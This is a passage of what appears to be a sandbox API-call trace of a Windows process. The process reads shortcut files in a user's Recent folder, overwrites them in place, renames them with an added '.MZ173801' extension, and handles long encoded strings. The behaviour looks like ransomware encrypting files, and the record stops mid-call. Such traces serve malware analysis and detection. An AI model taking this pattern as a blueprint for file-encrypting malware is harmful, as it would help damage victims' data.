lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s1HnMB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\s1hnmb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb0cc211, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb0cc211, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb0cc211, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x42b)) returned 1 [0111.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.420] GetCurrentThreadId () returned 0x1358 [0111.420] GetCurrentThreadId () returned 0x1358 [0111.420] GetCurrentThreadId () returned 0x1358 [0111.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.420] GetCurrentThreadId () returned 0x1358 [0111.420] GetCurrentThreadId () returned 0x1358 [0111.420] GetCurrentThreadId () returned 0x1358 [0111.420] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s1HnMB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\s1hnmb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.420] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.420] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.421] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x42b [0111.421] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.421] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x42b, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x42b, lpOverlapped=0x0) returned 1 [0111.422] CloseHandle (hObject=0x3f4) returned 1 [0111.422] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s1HnMB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\s1hnmb.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.423] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x42b, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x42b, lpOverlapped=0x0) returned 1 [0111.423] CloseHandle (hObject=0x3f4) returned 1 [0111.424] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s1HnMB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\s1hnmb.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s1HnMB.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\s1hnmb.lnk.mz173801")) returned 1 [0111.425] GetCurrentThreadId () returned 0x1358 [0111.425] GetCurrentThreadId () returned 0x1358 [0111.425] GetCurrentThreadId () returned 0x1358 [0111.425] GetCurrentThreadId () returned 0x1358 [0111.425] GetCurrentThreadId () returned 0x1358 [0111.425] GetCurrentThreadId () returned 0x1358 [0111.425] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x754b773c, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x754b773c, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x754b773c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2a1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="sCm_S8YjQxWQT08.lnk", cAlternateFileName="SCM_S8~1.LNK")) returned 1 [0111.425] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.425] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.425] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sCm_S8YjQxWQT08.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\scm_s8yjqxwqt08.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x754b773c, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x754b773c, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x754b773c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2a1)) returned 1 [0111.426] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.426] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.426] GetCurrentThreadId () returned 0x1358 [0111.426] GetCurrentThreadId () returned 0x1358 [0111.426] GetCurrentThreadId () returned 0x1358 [0111.426] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.426] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.427] GetCurrentThreadId () returned 0x1358 [0111.427] GetCurrentThreadId () returned 0x1358 [0111.427] GetCurrentThreadId () returned 0x1358 [0111.427] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sCm_S8YjQxWQT08.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\scm_s8yjqxwqt08.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.427] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.427] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.427] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x2a1 [0111.427] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.427] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x2a1, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, 